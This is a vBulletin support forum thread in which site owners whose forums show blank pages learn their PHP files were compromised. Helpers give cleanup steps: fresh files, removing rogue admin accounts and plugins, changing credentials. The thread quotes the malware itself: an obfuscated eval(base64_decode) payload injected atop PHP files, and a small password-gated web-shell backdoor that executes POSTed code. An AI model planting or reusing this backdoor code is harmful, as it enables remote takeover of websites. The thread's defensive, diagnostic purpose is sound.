Announcement

Collapse
No announcement yet.

Help. Both forum and admin panel just show white page

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Help. Both forum and admin panel just show white page

    I am running 4.22
    Today my forum and admin has disappeared and just shows a white page.

  • #2
    What changes have been made since it last worked?
    This includes changes made on the server.
    MARK.B | vBULLETIN SUPPORT

    TalkNewsUK - My vBulletin 5.5.6 Demo
    AdminAmmo - My Cloud Demo

    Comment


    • #3
      Absolutely none

      Comment


      • #4
        Web host suggested checking php error log. There is a list of errors - but I have now no idea what to do

        Comment


        • #5
          Post some of the most recent errors in the error log here- feel free to hide/ erase the path to the files if you want for added security.

          Also, check any of your php files, like forum.php, does it look like this or something different? If there are lines between <?php and what you see below you files may have been compromised.

          Code:
          <?php
          /*======================================================================*\
          || #################################################################### ||
          || # vBulletin 4.2.2 - Licence Number ....
          || # ---------------------------------------------------------------- # ||
          || # Copyright 2000-2013 vBulletin Solutions Inc. All Rights Reserved. ||
          || # This file may not be redistributed in whole or significant part. # ||

          Comment


          • #6
            Forum php:
            <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVF kwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMw dzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1Wamxr

            Comment


            • #7
              Error log:
              :
              /home3/findhors/public_html/stabletostable/forums/error_log: [19-Dec-2013 03:58:25] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:35] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:36] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/showthread.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:40] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 03:58:44] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:20] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:24] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/login.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:47] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:00:49] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/showthread.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:01:37] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/calendar.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:02:08] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:02:35] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:03:03] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:00] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:19] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:04:55] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:02] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:14] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:14] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/login.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:05:26] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:11] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:34] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:06:42] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:10] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forum.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:18] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/calendar.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:28] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:48] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:50] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/search.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:07:53] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/forumdisplay.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/global.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1 [19-Dec-2013 04:08:05] PHP Fatal error: Cannot redeclare fi() (previously declared in /home3/findhors/public_html/stabletostable/forums/entry.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code:1) in /home3/findhors/public_html/stabletostable/forums/blog.php(1) : eval()'d code(2) : eval()'d code(1) : eval()'d code on line 1:

              Comment


              • #8
                Originally posted by stable2 View Post
                Forum php:
                <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVF kwWDJSbFkyOWtaU2duWlU1d1ZHTm1abmhrTTB3d1ExazFWMm93TDB4cVJtVlFkRmhWYzB0cmNYTXhSa0pRVEZOeVMw dzBjRmhXT1VKVVREQnZkSGxET0hGNVkzaE1Wamxr
                That looks compromised. I would upload a fresh set of vb files. That may fix the issue but won't answer why the files got compromised.

                Comment


                • #9
                  OK. Will I be able to do that even though I cannot get into admin cp?

                  Comment


                  • #10
                    Yes just use FTP.

                    Looks like you are not the only one. Post 6
                    http://www.vbulletin.com/forum/forum...-base64-please

                    Comment


                    • #11
                      This appears to be the same problem several of us reported yesterday. It appears a new kind of attack has cropped up.
                      A complete re-load of the vB files fixed our site last night, but it's down again this morning. I changed passwords for all the admin accounts, my FTP, etc., but the site went down again anyway.

                      Comment


                      • #12
                        95% sure you have a compromised plugin- the only way to find it though it to upload a fresh set of vBulletin files, that will get your site online again. Then immediately go to your Admin CP and disable any plugins you see in plugin manager listed at the top under the "vBulletin" Product. Check each one individually- by default there are no plugins for this product- so any there should be ones you created yourself. Disable or delete any you don't recognize.

                        Next you need to do more clean up and securing your site- follow the steps in these two blogs-

                        http://www.vbulletin.com/forum/blogs...ve-been-hacked

                        http://www.vbulletin.com/forum/blogs...vbulletin-site

                        Comment


                        • #13
                          I've ran into this a few times lately and was even discussing this with Greg from URLJet today sadly, here's what to look for:
                          • New Administrators (typically the name used is qaz001 and there might be 5+ or more new admin accounts all using the same name)
                          • New Plugins (init_startup hook primarily connecting to subscriptions.php OR a different plugin allowing them to do what they wish from the FAQ page).
                          • New files.

                          ^ This includes files such as img.php / datastore_movie.php and similar, the files may contain code such as:
                          PHP Code:
                          <?php

                          if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {

                          eval (
                          base64_decode($_POST["php"]));

                          exit;

                          }

                          ?>

                          Furthermore there will also be shell scripts uploaded to your site, rather nasty ones at that! The malicious files were inserted throughout various folders such as /includes/ and includes/cron/ and others so be sure to take your time and check all folders by hand noting timestamps on files, one of the file I encountered had a 2006 timestamp while others were dated 2012.
                          • Modified Files.

                          ^ These modified files are nearly all .php files so with that being said you must, I repeat, you must upload 100% fresh files. What files you ask? ALL of them, download a 100% fresh version of vBulletin, all of your modifications files need to be replaced as well this includes all you've downloaded from vbulletin.org and all third-party modifications or any software within the same /public_html/ i.e. root directory of the site and/or forum. I cannot stress enough that you need to upload fresh files however yes feel free to edit all by hand however every single instance in a file where <?php is will have the base64 code directly following I can guarantee that so don't waste your time simply replace and be done with it.

                          Code added to all .php files near top will be:
                          PHP Code:
                          <?php eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1d01WVmpSVXQzYWtGTkwxSlZVRkZvVjBkUWVVRmxOWE5YVERSTlIycFRRbXhrTTBGd01VeFdhMGc0S3psME1HMDNaRUpET1VvcmNFd3pXSFJ3ZFV3NVptSjFZbnBsU0RCTEszUkNWRkJWTkd4WlpsaGFRMmxqTVVKRVFsUlJWVXBUTmpBMVV6bExRVkpzVGxOQmJFbDViakpHVFVKaVVqRXlWbGRNU1VoVU1WWkZSVGhrU1VkSWJGazRVMUpIZG1wTE1taDNSRUUyUm1sVllWUlZhbFpKTjA4eVNuQmFhRU5DWVd4QmFrOXZkR1JrUlRWQlYzRm9jSGN6YVZBMFpIVlVXWE42ZG1wbGNYRk1UMEpLVUVGWFdFVm9OSEJTZWtOM09Ya3JWMXB5VDBkVVlYVTFiakZsVTBnMll6VXZiVXhRY1hJd0wyRmlTMFV6ZFZVclMwUnhTR2hXTTNSWVVFMUZMekZaV20xaFJrUmFlVWhqTVRBeFZ6Y3liVkJzYzJSb09EbFNXaTlpYWxKMGR6ZzRaRVF2ZG1wR2VsSldibG8wUFNjcEtTazdJRDgrUEQ4Z1pYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1dk1XbzVSazk0UTBGUlVsZzViRkY0Y21KdFoySmxNMWQzWVhZd1RqaEhRM0ZHWTFOdVZVdGlaMU0wTnpnM01WY3dlWGxVTTJONlNqQmFOV2hMYm1wRGJXVmFkWGRoTjB3NFluVkVkMVJSWlRKRmVqTnNPVlYxY0VSdmNuZzFhMEZIVlVkT2NuRTNaWGx5U2xRck15OU5hV1Z4TVhwbVF6VmFNa1ZDVmpoVGJVbFJRbkZPYWtsV2FFMXpUVlJyYTNSMk9XZEtPVmRVYld4b2FFUldVbHB2TTI5R2JVTTVWMUZOYURjeVUzTkxNVVpUV1dSNGVUSlRaVlZPWTFZM2VrZERWMjlVU210cVRGWlJkVTUxY1ZGdWVYcFlOWEJxSzI4NE0wTjZValZRV0dKNVkyVjZNVkY1UWpsVldIVm1VemhyUm5FclZ5OXlNMmxEU0hKbU9WZ3lTM0F5ZDNKVVkyUTNUV0ZHU3paSWRHVnRXVGxOUldzM1pYTkhSR3R5SzJwUVdsaERhV1ZIYm1od09GQllPRGgzZEdWWU1qTkhKeWtwS1RzZ1B6NDhQeUJsZG1Gc0tHZDZkVzVqYjIxd2NtVnpjeWhpWVhObE5qUmZaR1ZqYjJSbEtDZGxUbkE1YXprNVRIZDZRVkZuVUN0V1QxRndUSE5GYW5VeWJsTnlXWGM0VkRadWQxbExkRE13Y0ZsUmFUWnhRWFpMTkhkS2QzUnFMMkp1TjI5a2JYTmhTREJ5VXpOdVpETjVaR05yTW5VeGNrMWtjekJVVUVKd2NFOWpkMmw0WWt4d04zWTFZMnhYVGpack1WUnFNVkZzUms1UGVEZHNaRkY2VUVsNFEwTkZkMDV1VUZKbkswVktlVE5PU1RSc016ZDBaakZuTkd4eVkxTlFUbmN4ZUZRNWNITnNkbGhyTDBvNVFucFRVU3RNYmxOeldEQm9iMFJpVW1WSGNHaFpSM0k0ZDB0M0t6TkJWa3R3YWxwbmJtaFNUVXhyYzJGS1N6ZGhWMUJHTDNGSmRVb3ZWa3hVTkhwalduTlBkV0pLZDJaNlEwSnVWV0l3Y1hsMFpXbHlRamRYTml0bE5reFBOa3h6YVdwa09ISktUemhGVnk4eFVFNUdPR0pvVjNCdk4xaEpTR1V5V2t0NE0ydElSR1UzWjJJcmNuaFRSVk5SVFUxRlJWbEhSME5TVFVadFFWTjNiM2RFVkVWeFdWTlpRMUpvVFd0RVZFVlpXVVZCUm05VVEwVkpVVUpOUzFsUlEybHhhVWhuUjNGc2NrTk5hRWRqUTJSWmRXaE5iaXQ1UmpCVlVGbDJVa2hXUkhkRVpGTXplRUZSYW14Uk5HRlBVRGhaU1N0MGVERkljR0ZMV0ROUlJsRTJaMmx1YlUwNWNqVmpUbTByZGlzeVltUnVjemR6VEdSMGVVdGxaak00TVdWWU5XNXFPR1puUkZkV1ZtRmFkejA5SnlrcEtUcz0iKSk7DQo="));

                          !Attention! If you/your host is running any form of backup software or for example if you see a public_html.bak folder, that must be replaced/renamed/deleted (**Try setting CHMOD permissions to 000 then check the site ensuring nothing is connecting i.e. utilizing anything from the .bak folder first before deleting it!) otherwise if the files are seen as modified/missing and they are replaced... well the replacement file comes from public_html.bak which by now more than likely has a backup of the file in it's hacked state .

                          *After you clean the site remember to change all database users, don't just change the users password remove the user from the database and assign a new user w/ full permissions. Change all FTP account passwords and also your forum administrator account password. Also I want to mention that I've noticed after adding in .htaccess protection to admincp and modcp folders the hacker was not able to hack the site again and on many of these sites the /install/ folder was not present therefor it is not the recent install folder exploit as of late.

                          Use the links Joe posted and feel free to use my older blog entry it's still valid and I reply accordingly when prompted to .
                          Last edited by TheLastSuperman; Thu 19th Dec '13, 11:40pm.


                          Former vBulletin Support Staff
                          Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
                          Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!
                          Need a Host? - I recommend URLJet

                          Comment


                          • #14
                            This is getting freaking ridiculous. Surely you will do something about this vBulletin. Your patch 8 is definitely unstable. I have re-installed the patch 8 files 5 times but keep getting hacked. I have 2 plugins. A thank you hack and a custom hack. These are not the issues. Please address the issue with your code and release a new patch. Our site gets over 150,000 impressions per day and we are seriously considering switching software. Surely you cannot assume that the 100+ people having this issue just have a faulty plugin. We only have 2 and none are the issue.

                            Thanks,

                            Comment


                            • #15
                              Originally posted by XDuncan View Post
                              This is getting freaking ridiculous. Surely you will do something about this vBulletin. Your patch 8 is definitely unstable. I have re-installed the patch 8 files 5 times but keep getting hacked. I have 2 plugins. A thank you hack and a custom hack. These are not the issues. Please address the issue with your code and release a new patch. Our site gets over 150,000 impressions per day and we are seriously considering switching software. Surely you cannot assume that the 100+ people having this issue just have a faulty plugin. We only have 2 and none are the issue.

                              Thanks,
                              Offhand I'm not sure which old version is already up to Patch 8 but our first advice on securing a site is to download./install the latest version which is 4.2.2 and has no patches available.

                              Also, after the first hack you should not have needed to install the patch anymore but simply re-upload a fresh set of files which would have had the patch included already when you downloaded them from the Member's Area.

                              I see you have ticket support- please open a support ticket in the Member's Area with "Attn: Joe D" and include Admin CP and FTP login info in the sensitive data field of the support ticket system and I'll take a look to see if I can find the reason you have been getting re-hacked.

                              At this point I am still going on the theory most of these were due to the earlier /install/ exploit and there have been "sleeper" administrator accounts on these sites that were never noticed or removed because the sites weren't initially defaced.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X